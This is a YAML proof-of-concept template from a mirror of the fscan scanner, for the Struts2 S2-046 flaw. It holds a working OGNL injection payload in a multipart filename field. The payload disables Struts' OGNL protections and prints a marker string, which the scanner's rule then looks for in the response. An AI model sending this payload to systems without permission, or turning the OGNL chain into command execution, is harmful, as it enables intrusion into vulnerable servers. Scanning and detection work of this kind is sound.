mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-22 03:10:42 +08:00
17 lines
1.2 KiB
YAML
17 lines
1.2 KiB
YAML
name: poc-yaml-struts2_046-1
|
|
set:
|
|
r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
|
|
rules:
|
|
- method: POST
|
|
path: /
|
|
headers:
|
|
Content-Type: multipart/form-data; boundary=---------------------------
|
|
follow_redirects: true
|
|
body: |
|
|
{{r1}}
|
|
expression: |
|
|
response.body.bcontains(b"struts2_security_check")
|
|
detail:
|
|
author: shadown1ng(https://github.com/shadown1ng)
|
|
|